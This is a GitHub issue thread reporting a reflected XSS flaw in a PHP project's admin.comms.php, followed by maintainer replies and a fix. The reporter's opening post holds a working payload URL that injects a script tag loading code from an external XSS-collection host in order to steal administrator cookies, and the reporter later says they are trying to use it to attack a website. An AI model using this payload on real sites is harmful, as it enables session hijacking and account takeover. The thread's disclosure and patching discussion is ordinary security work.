Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS vulnerability in admin.comms.php #253

Closed
l33cy opened this issue Apr 13, 2017 · 9 comments

Comments

Projects
None yet
6 participants
@l33cy
Copy link

commented Apr 13, 2017

There is a reflective XSS vulnerability in the 21 line of the admin.comms.php file.
Hackers can exploit this vulnerability to obtain an administrator's cookies.

http://domain/index.php?p=admin&c=comms&rebanid=1123123123123123123231223");</script><script src=http://xsspt.com/phssz8?1492070578></script><script>alert("a
Effect in browser:
image
image
code:
image

Do not print the user input data directly on the page. Please.
My English is so poor.
Could you help me apply for a CVE number for this vulnerability?
I need it.
Thank you very much。

  • Version used: 1.5.4.7
  • PHP and MySQL version: php7.0.12 mysql5
  • Operating System and version: windows10
  • Link to your project:localhost
@good-live

This comment has been minimized.

Copy link

commented Apr 13, 2017

I don't really see how you can abuse this to get an administrators cookie?
Also modern browsers (Tried with chrome) are blocking it.

@l33cy

This comment has been minimized.

Copy link
Author

commented Apr 13, 2017

Try Firefox

@l33cy

This comment has been minimized.

Copy link
Author

commented Apr 13, 2017

The use of a certain limit, but does not affect the vulnerability of the harm. I'm trying to exploit this vulnerability to attack a website.

@K1N62

This comment has been minimized.

Copy link
Contributor

commented Apr 16, 2017

If a user opens the link in their browser the script will be executed, this is how your cookie is stolen. However this link does more than just showing an alert for demonstration purpose, this link actually downloads a script and runs it! DO NOT CLICK THE LINK

@l33cy

This comment has been minimized.

Copy link
Author

commented Apr 17, 2017

Please apply for CVE number on this site. https://cveform.mitre.org/

@eNNercY1337

This comment has been minimized.

Copy link

commented Apr 17, 2017

very useful for such a small software @l33cy rather show them the fix for it ;)

@Sarabveer

This comment has been minimized.

Copy link
Member

commented Apr 17, 2017

@l33cy we have had many security holes what were patched and never were on CVE

@Groruk

This comment has been minimized.

Copy link
Member

commented Apr 17, 2017

Applying for a CVE for such an exploit in a small open source project would take longer than just fixing it as the fix would just be the filtering of every $_GET, $_POST and $_SERVER variable. Consider it patched by tomorrow.

@Groruk

This comment has been minimized.

Copy link
Member

commented Apr 17, 2017

Fixed with e63701e

@Groruk Groruk closed this Apr 17, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.